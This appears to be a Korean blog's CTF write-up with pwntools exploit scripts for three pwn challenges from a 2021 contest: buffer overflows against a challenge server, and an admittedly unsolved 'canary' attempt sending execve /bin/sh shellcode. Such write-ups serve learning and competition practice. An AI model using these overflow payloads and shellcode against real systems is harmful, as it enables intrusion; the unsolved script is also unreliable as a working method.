2021 tamuctf Writeup

CTF-Writeup 2021. 9. 17. 00:42

728x90

PWN

warmup

from pwn import *

p = remote('194.5.207.56',7000)

payload = "A"*80

p.sendlineafter('name:', payload)

p.interactive()

Babypwn

from pwn import *

p = remote('194.5.207.56',7010)
wow = 0x4012ec
payload = b""
p.sendlineafter('name: ', b"A"*0x1c+p64(0xcafe))

payload += b"B"*128
payload += b"C"*8
payload += p64(wow)

p.sendlineafter(b';;)', payload)
p.interactive()

canary(이건 못품)

작성했던 코드

from pwn import *

p = process('./canary')
e = ELF('./canary')

gdb.attach(p)
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
p.sendlineafter('chars): ', shellcode)
p.sendlineafter('chars): ', "A"*16)

p.recvuntil('address: ')
canary = int(p.recvuntil('\n')[:-1], 16)
shell = canary + 0xc
payload = b"B"*0x14
payload += p64(shell)
p.sendlineafter('number: ', payload)
raw_input()
p.interactive()

728x90

'CTF-Writeup' 카테고리의 다른 글

2021 TSG CTF Write-up (0)	2021.10.05
ACSC(Asia Cyber Security Challenge) 2021 Writeup (0)	2021.09.19
Grabcon2021 Write-up (0)	2021.09.17
DCTF 2021 Write-up (0)	2021.08.23
corCTF 2021 Write-up (0)	2021.08.23

Rasser

Rasser :: Rasser

2021 tamuctf Writeup

PWN

'CTF-Writeup' 카테고리의 다른 글

티스토리툴바